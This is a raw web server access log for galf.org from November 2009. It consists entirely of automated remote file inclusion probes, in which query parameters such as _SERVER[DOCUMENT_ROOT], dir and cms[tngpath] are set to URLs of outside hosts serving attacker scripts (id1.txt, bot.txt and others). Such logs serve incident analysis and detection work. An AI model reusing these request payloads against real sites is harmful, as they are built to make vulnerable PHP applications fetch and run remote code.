211.40.68.132 - - [01/Nov/2009:21:27:47 -0800] "GET /setup.php?setup[use_category]=1&dir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
121.78.112.195 - - [01/Nov/2009:21:27:57 -0800] "GET /logs/access_090720.log////?_SERVER[DOCUMENT_ROOT]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.112.195 - - [01/Nov/2009:21:27:57 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
121.78.112.195 - - [01/Nov/2009:21:27:57 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
121.78.112.195 - - [01/Nov/2009:21:28:28 -0800] "GET /logs/access_090323.log////?_SERVER[DOCUMENT_ROOT]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:21:28:34 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:21:28:34 -0800] "GET /logs//?path%5Bdocroot%5D=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [01/Nov/2009:21:30:22 -0800] "GET /logs/access_091005.log//config.php?setup[use_category]=1&dir=http://www.kagul.ru/2/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [01/Nov/2009:21:30:22 -0800] "GET /logs//config.php?setup[use_category]=1&dir=http://www.kagul.ru/2/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [01/Nov/2009:21:30:22 -0800] "GET /config.php?setup[use_category]=1&dir=http://www.kagul.ru/2/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.210.123.70 - - [01/Nov/2009:21:30:27 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.210.123.70 - - [01/Nov/2009:21:30:27 -0800] "GET /logs/access.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.210.123.70 - - [01/Nov/2009:21:30:27 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.210.123.70 - - [01/Nov/2009:21:30:27 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.210.123.70 - - [01/Nov/2009:21:30:27 -0800] "GET /logs/access_090928.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.210.123.70 - - [01/Nov/2009:21:30:27 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:21:30:33 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:21:30:33 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:21:30:33 -0800] "GET /?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:21:30:47 -0800] "GET /logs/access_090525.log%20%20//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:31:21 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:31:21 -0800] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:31:21 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:31:26 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:31:43 -0800] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:31:43 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:31:43 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:31:51 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.112.195 - - [01/Nov/2009:21:33:09 -0800] "GET /logs/access_090720.log////?_SERVER[DOCUMENT_ROOT]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.112.195 - - [01/Nov/2009:21:33:09 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
121.78.112.195 - - [01/Nov/2009:21:33:09 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:21:33:20 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [01/Nov/2009:21:33:20 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [01/Nov/2009:21:33:20 -0800] "GET /logs/access.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [01/Nov/2009:21:33:20 -0800] "GET /logs/access_090928.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:21:33:20 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:21:33:20 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.112.195 - - [01/Nov/2009:21:33:26 -0800] "GET /logs/access_090323.log////?_SERVER[DOCUMENT_ROOT]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.210.123.70 - - [01/Nov/2009:21:34:12 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.210.123.70 - - [01/Nov/2009:21:34:17 -0800] "GET /logs/access_090316.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.210.123.70 - - [01/Nov/2009:21:35:00 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [01/Nov/2009:21:36:34 -0800] "GET /logs/access_090316.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:21:37:08 -0800] "GET //standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:21:37:08 -0800] "GET /logs/access.log%20%20///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:21:37:08 -0800] "GET /logs///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:21:37:13 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.136.177.137 - - [01/Nov/2009:21:38:12 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.136.177.137 - - [01/Nov/2009:21:38:13 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.136.177.137 - - [01/Nov/2009:21:38:13 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.136.177.137 - - [01/Nov/2009:21:38:32 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.136.177.137 - - [01/Nov/2009:21:38:33 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.136.177.137 - - [01/Nov/2009:21:38:33 -0800] "GET /logs/access_091012.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:21:38:38 -0800] "GET /logs/access_090831.log//?path%5Bdocroot%5D=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:21:38:38 -0800] "GET /logs/access_090323.log//?path%5Bdocroot%5D=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.88.229.100 - - [01/Nov/2009:21:40:29 -0800] "GET /logs/access_091012.log//?sourcedir=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:42:17 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:42:20 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:42:28 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:42:28 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:43:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:43:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:43:55 -0800] "GET /logs/access_090706.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:43:57 -0800] "GET /logs/access_090706.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:43:57 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:43:57 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:44:08 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:44:08 -0800] "GET /logs/access_090706.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:44:09 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:45:37 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:45:37 -0800] "GET /logs/access_090511.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:45:37 -0800] "GET /logs/access_090420.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:45:37 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:11 -0800] "GET /logs/access_090420.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:11 -0800] "GET /logs/access_090511.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:11 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:11 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:12 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:12 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:12 -0800] "GET /logs/access_090706.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:15 -0800] "GET /logs/access_090706.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:15 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:17 -0800] "GET /logs/access_090706.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:17 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.0" 200 4931 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:46:21 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:46:27 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:46:45 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [01/Nov/2009:21:46:45 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [01/Nov/2009:21:46:45 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [01/Nov/2009:21:46:46 -0800] "GET /logs/access_090817.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:46:58 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [01/Nov/2009:21:46:58 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.111.12.199 - - [01/Nov/2009:21:46:58 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [01/Nov/2009:21:47:10 -0800] "GET /logs/access_090817.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:47:13 -0800] "GET /logs/access_090727.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.136.177.137 - - [01/Nov/2009:21:47:17 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [01/Nov/2009:21:47:17 -0800] "GET /logs/access_090727.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.136.177.137 - - [01/Nov/2009:21:47:20 -0800] "GET /logs/access_091012.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:47:20 -0800] "GET /logs/access_090817.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [01/Nov/2009:21:47:36 -0800] "GET /logs/access_090727.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [01/Nov/2009:21:48:32 -0800] "GET /logs/access_090720.log//members/upload.aspx?path=http://www.kagul.ru/2/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [01/Nov/2009:21:48:32 -0800] "GET /members/upload.aspx?path=http://www.kagul.ru/2/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [01/Nov/2009:21:48:32 -0800] "GET /logs//members/upload.aspx?path=http://www.kagul.ru/2/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:48:44 -0800] "GET /logs///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
141.223.60.4 - - [01/Nov/2009:21:48:44 -0800] "GET /logs/access.log%20%20///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [01/Nov/2009:21:49:01 -0800] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:49:02 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:49:03 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:49:04 -0800] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:49:06 -0800] "GET /logs/access_091012.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:49:08 -0800] "GET /logs/access_091012.log%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:49:18 -0800] "GET //skin/dognara_gallery/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:49:18 -0800] "GET /logs/access.log%20%20///skin/dognara_gallery/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:49:18 -0800] "GET /logs///skin/dognara_gallery/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
141.223.60.4 - - [01/Nov/2009:21:50:07 -0800] "GET /logs/access.log%20%20///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
141.223.60.4 - - [01/Nov/2009:21:50:07 -0800] "GET //standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
